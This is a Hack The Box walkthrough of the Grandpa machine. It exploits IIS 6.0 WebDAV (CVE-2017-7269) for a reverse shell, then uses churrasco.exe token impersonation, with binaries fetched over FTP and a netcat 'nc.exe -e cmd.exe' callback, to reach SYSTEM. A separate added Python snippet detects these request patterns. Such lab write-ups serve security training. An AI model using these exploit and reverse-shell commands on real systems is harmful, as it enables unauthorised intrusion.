HTB: Walkthrough without Metasploit. ~[GRANDPA]

Akash Pawar
4 min read, Apr 8, 2020


IIS 6.0 privilege escalation using impersonation

Machine IP: 10.10.10.14

1. Scanning and Enumeration-

A basic Nmap scan gives the results below.

We can see that many HTTP methods are enabled, one of which is PUT, which could allow uploading a shell.

Visiting the IP shows a default page.

To check for PUT upload vulnerabilities, we will use DAVTest, which ships with Kali Linux:

davtest -url http://10.10.10.14

This fails: the PUT method does not let us upload a shell.
Next, use searchsploit to look for IIS 6.0 exploits:

root@kali:~# searchsploit IIS 6.0

We will use the Microsoft IIS 6.0 — WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow exploit (https://exploit-db.com/exploits/41738).

root@kali:~# searchsploit -m 41738

The -m option copies the exploit into the current directory. The CVE for this exploit is CVE-2017-7269; searching Google for “CVE-2017-7269 exploit Github” leads to the exploit below, which we download:

root@kali:~# wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell

Rename the exploit:

root@kali:~# mv iis6\ reverse\ shell exploit.py

2. Gaining Initial Access-

Use Netcat to create a listener on port 1234:
root@kali:~# nc -nlvp 1234

Now run the exploit with Python:
root@kali:~/hackthebox/07-Grandpa# python exploit.py 10.10.10.14 80 10.10.14.7 1234

NOTE: we got the shell. If the exploit is not working, simply reset the machine and try again; in my case resetting the machine helped.

Here we got a shell, but it runs with limited privileges and cannot access any of the users' files.
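As an added defender-side example (not part of the original write-up), the following Python flags the two request patterns this box exposes: a WebDAV PUT upload like the one DAVTest probes for, and a PROPFIND carrying an overlong If header, the trigger pattern for CVE-2017-7269. The length threshold and the sample requests are constructed assumptions, not traffic captured from the box.

```python
"""Flag WebDAV requests matching the two IIS 6.0 techniques in this write-up:
PUT uploads (what DAVTest probes for) and PROPFIND with an abnormally long
'If:' header (the CVE-2017-7269 ScStoragePathFromUrl overflow trigger)."""

# Assumption: legitimate 'If:' headers hold short lock tokens; longer is suspect.
IF_HEADER_MAX_LEN = 256
WRITE_METHODS = {"PUT", "MOVE", "COPY"}


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers with lowercase names)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def analyze_request(raw: bytes) -> list:
    """Return findings for one request; an empty list means nothing flagged."""
    method, path, headers = parse_request(raw)
    findings = []
    if method in WRITE_METHODS:
        findings.append(f"{method} {path}: WebDAV write method used")
    if_len = len(headers.get("if", ""))
    if method == "PROPFIND" and if_len > IF_HEADER_MAX_LEN:
        findings.append(f"PROPFIND {path}: If header is {if_len} bytes, "
                        "possible CVE-2017-7269 (ScStoragePathFromUrl) attempt")
    return findings


def scan(samples) -> dict:
    """Map the index of each flagged request to its findings."""
    return {i: f for i, raw in enumerate(samples) if (f := analyze_request(raw))}


# Constructed sample traffic (not captured from the box): a benign GET, a
# DAVTest-style PUT, a benign PROPFIND with a lock token, an overlong If header.
SAMPLES = [
    b"GET / HTTP/1.1\r\nHost: 10.10.10.14\r\n\r\n",
    b"PUT /davtest.txt HTTP/1.1\r\nHost: 10.10.10.14\r\nContent-Length: 4\r\n\r\ntest",
    b"PROPFIND /a HTTP/1.1\r\nHost: 10.10.10.14\r\n"
    b"If: <http://10.10.10.14/a> (<opaquelocktoken:abc>)\r\n\r\n",
    b"PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
    b"If: <http://localhost/" + b"A" * 1500 + b">\r\n\r\n",
]
```

Running scan(SAMPLES) flags only the PUT and the overlong-If PROPFIND; the benign GET and the lock-token PROPFIND pass.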

3. Privilege Escalation-

For Windows we mostly use Windows-Exploit-Suggester:

root@kali:~# python windows-exploit-suggester.py --database 2020-04-04-mssb.xls --systeminfo ~/hackthebox/07-Grandpa/systeminfo.txt

It suggests many exploits. I tried all of them and failed, but as I already said, I want to solve this without Metasploit; if you want to try them, you can download compiled binaries of all the exploits from here and give it a try:
https://github.com/SecWiki/windows-kernel-exploits/

Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:
For more detail, you can check this blog: Link

Let’s download the exploit binary and copy nc.exe into the same location:

root@kali:~/hackthebox/07-Grandpa# wget https://github.com/Re4son/Churrasco/blob/master/churrasco.exe?raw=true

Rename the binary:

mv churrasco.exe\?raw\=true churrasco.exe

root@kali:~/hackthebox/07-Grandpa# cp /usr/share/windows-resources/binaries/nc.exe .

Now we need to get our binaries onto the box. I tried PowerShell, but it is not available there, so we will transfer the files over FTP. First, start an FTP server on Kali using Python:

root@kali:~/hackthebox/07-Grandpa# python -m pyftpdlib -p 21

On the box we need a directory where we can write files, so go to:

C:\>cd wmpub

C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET churrasco.exe >> ftp.txt&echo bye>> ftp.txt

This creates a file ftp.txt containing the FTP commands to download churrasco.exe; then run it:

C:\wmpub>ftp -v -n -s:ftp.txt

C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt

This creates a file ftp.txt containing the FTP commands to download nc.exe; then run it:

C:\wmpub>ftp -v -n -s:ftp.txt

Checking the FTP server:

Here we can see both binaries got downloaded from the FTP server,

and on the shell we can see we have both binaries.

Create a listener on port 7777 so churrasco.exe can make a reverse connection to our host:

nc -nlvp 7777

Now execute the binary:
churrasco.exe -d "C:\wmpub\nc.exe 10.10.14.7 7777 -e cmd.exe"

Now check the listener: here we have system access.

Thanks to Rana Khalil — Inspired by her Journey!
Thanks to MrNmap — for the blog of Windows Privilege Escalation via Token Kidnapping
